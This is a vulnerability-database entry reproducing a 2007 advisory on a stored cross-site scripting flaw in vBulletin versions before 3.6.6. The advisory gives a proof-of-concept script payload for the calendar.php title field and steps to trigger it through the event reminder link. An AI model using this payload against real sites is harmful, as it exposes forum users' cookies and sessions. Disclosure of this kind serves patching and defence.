Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:17037
HistoryMay 17, 2007 - 12:00 a.m.

vbulletin < 3.6.6 [permanent xss]

2007-05-1700:00:00
vulners.com
22
JSON

vendor site:http://www.vbulletin.com/
product:vbulletin < 3.6.6
bug: permanent xss
affected file: calendar.php
risk : medium

xss permanent ( must be loggued ) PoC :
http://127.0.0.1/vbulletin/calendar.php?do=add&amp;type=single&amp;c=1
–> fill up the title field with :
</title><script>alert(document.cookie)</script>

Event Date : ( some far away date … like 2010 for exemple )
message : whatever .

when it's done look at the :"Request Reminder for this Event" link.
(it looks like this: http://127.0.0.1/vbulletin/calendar.php?do=addreminder&amp;e=2&#41;
if you click,your XSS will be executed .

reminder:
permanent xss are dangerous …
see : http://en.wikipedia.org/wiki/Cross_site_scripting

regards laurent gaffiΠΉ
contact: laurent.gaffie[at]g//m//a//i//l.com

JSON